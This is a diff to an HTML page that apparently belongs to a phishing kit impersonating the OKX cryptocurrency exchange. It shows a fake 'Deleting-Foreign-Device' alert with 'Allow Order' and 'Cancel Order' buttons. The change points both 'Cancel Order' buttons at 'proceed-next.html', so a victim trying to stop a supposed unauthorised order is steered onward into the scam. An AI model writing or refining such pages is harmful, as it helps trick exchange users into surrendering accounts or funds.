--- a/index.html
+++ b/index.html
@@ -30,7 +30,7 @@
           <div class="lottie-animation-3" data-w-id="7c99ccb5-6612-dc32-7fbb-70365c2cbcb2" data-animation-type="lottie" data-src="documents/ovLWGL5CjN.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-default-duration="0" data-duration="0"></div>
           <h5 class="heading-6 we jjk">Deleting-Foreign-Device..... Please wait</h5>
         </div>
-        <a data-w-id="a8a04656-7840-3211-4a2d-bc0b2ce4793b" href="#" class="interact-button button w-button">Cancel Order</a>
+        <a data-w-id="a8a04656-7840-3211-4a2d-bc0b2ce4793b" href="proceed-next.html" class="interact-button button w-button">Cancel Order</a>
       </div>
     </div>
     <section class="magic-area lome">
@@ -65,7 +65,7 @@
       </div>
       <div data-w-id="3a68b28d-f58f-e393-f845-aa11e2f4293e" style="display:none" class="div-block-16">
         <a data-w-id="10f050b4-4109-2bd3-ffb2-82ed8451a469" href="#" class="proceed w-button">Allow Order</a>
-        <a href="#" class="interact-button ashe w-button">Cancel Order</a>
+        <a href="proceed-next.html" class="interact-button ashe w-button">Cancel Order</a>
       </div><img src="images/Logo-OKX.png" loading="lazy" sizes="(max-width: 479px) 41.59375px, 100vw" srcset="images/Logo-OKX-p-500.png 500w, images/Logo-OKX-p-800.png 800w, images/Logo-OKX.png 1080w" alt="" class="image-2">
     </section>
     <div data-w-id="82f6ab90-78eb-bafc-0506-8e87900cbb2b" class="loading _1">
